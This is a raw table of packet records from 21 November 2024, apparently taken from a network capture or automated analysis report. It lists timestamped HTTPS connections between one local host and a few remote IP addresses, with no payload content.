                                                                                                                                                                                                            Nov 21, 2024 15:17:19.362574100 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.362617016 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.366384983 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.366401911 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.366502047 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.366508007 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.366576910 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.370768070 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.370790958 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.370847940 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.370861053 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.370878935 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.370898962 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.374483109 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.374564886 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.374571085 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.374603987 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.374634027 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.374660969 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.379709959 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.379728079 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.379786968 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.379796028 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.379837990 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.380709887 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.380755901 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.380776882 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.380784035 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.380820036 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.381155014 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.387593985 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.387609959 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.387664080 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.387669086 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.388097048 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.388097048 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.394186020 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.394280910 CET44349739188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.394373894 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.394687891 CET49739443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.394725084 CET44349739188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.410092115 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.410135031 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.410343885 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.415157080 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.415175915 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.440047979 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.440090895 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.440143108 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.440191984 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.440222025 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.440242052 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.444428921 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.444451094 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.444531918 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.444547892 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.444700003 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.447520018 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.447542906 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.447607040 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.447622061 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.447654009 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.447715998 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.450764894 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.450788975 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.450859070 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.450865984 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.450901031 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.450922012 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.454608917 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.454629898 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.454817057 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.454837084 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.454893112 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.456427097 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.456444979 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.456491947 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.456497908 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.456531048 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.456549883 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.460793018 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.460815907 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.460887909 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.460905075 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.460935116 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.461185932 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.462831020 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.462845087 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.462883949 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.462888956 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.462919950 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.462939978 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.467394114 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.467416048 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.467500925 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.467515945 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.467628956 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.469158888 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.469176054 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.469252110 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.469258070 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.469335079 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.473953962 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.473974943 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.474029064 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.474045038 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.474073887 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.474340916 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.475152969 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.475169897 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.475255966 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.475263119 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.475402117 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.479887962 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.479907036 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.480003119 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.480016947 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.480042934 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.480101109 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.504671097 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.504693985 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.504743099 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.504757881 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.504791021 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.504811049 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.509223938 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.509243965 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.509294987 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.509304047 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.509356022 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.509356022 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.514652014 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.514672995 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.514718056 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.514727116 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.514755964 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.514775991 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.519792080 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.519819975 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.519870043 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.519907951 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.519943953 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.519982100 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.520502090 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.520524979 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.520565987 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.520576954 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.520605087 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.520621061 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.524358988 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.524382114 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.524447918 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.524461031 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.524491072 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.524501085 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.524513960 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.524550915 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.524557114 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.524584055 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.524604082 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.526041031 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.526061058 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.526146889 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.526154041 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.526196957 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.529989958 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.530030966 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.530075073 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.530081987 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.530132055 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.530143023 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.530155897 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.530175924 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.530214071 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.530220985 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.530244112 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.530267000 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.534612894 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.534630060 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.534689903 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.534698009 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.534728050 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.534751892 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.536290884 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.536313057 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.536365986 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.536372900 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.536402941 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.536422014 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.539984941 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.540003061 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.540044069 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.540052891 CET44349730150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.540086985 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.540117979 CET49730443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.542552948 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.542571068 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.542623043 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.542629004 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.542681932 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.548943996 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.548962116 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.549009085 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.549015999 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.549047947 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.549067020 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.554938078 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.554956913 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.555113077 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.555123091 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.555169106 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.560424089 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.560441971 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.560525894 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.560534000 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.560579062 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.566728115 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.566756010 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.566797018 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.566807985 CET44349728150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.566840887 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.566854000 CET49728443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.591100931 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.592175961 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.592196941 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.592689037 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.592695951 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.604742050 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.604783058 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.605403900 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.605428934 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.605447054 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.605479002 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.605911016 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.605917931 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.606024981 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.606033087 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.606364012 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.606695890 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.606714964 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.607156038 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.607161999 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.644906998 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.644929886 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.645009995 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.645083904 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.645122051 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.645145893 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.646604061 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.646631002 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.646688938 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.646716118 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.646735907 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.646759987 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.649744034 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.649786949 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.649847984 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.649897099 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.649935961 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.649996042 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.653038025 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.653064966 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.653110981 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.653116941 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.653158903 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.655771017 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.655816078 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.655848026 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.655864000 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.655894995 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.655915976 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.658548117 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.658570051 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.658622026 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.658627033 CET44349727150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.658669949 CET49727443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.661902905 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.661953926 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.662007093 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.662024021 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.662050009 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.662066936 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:19.665288925 CET44349727150.171.28.10192.168.2.6
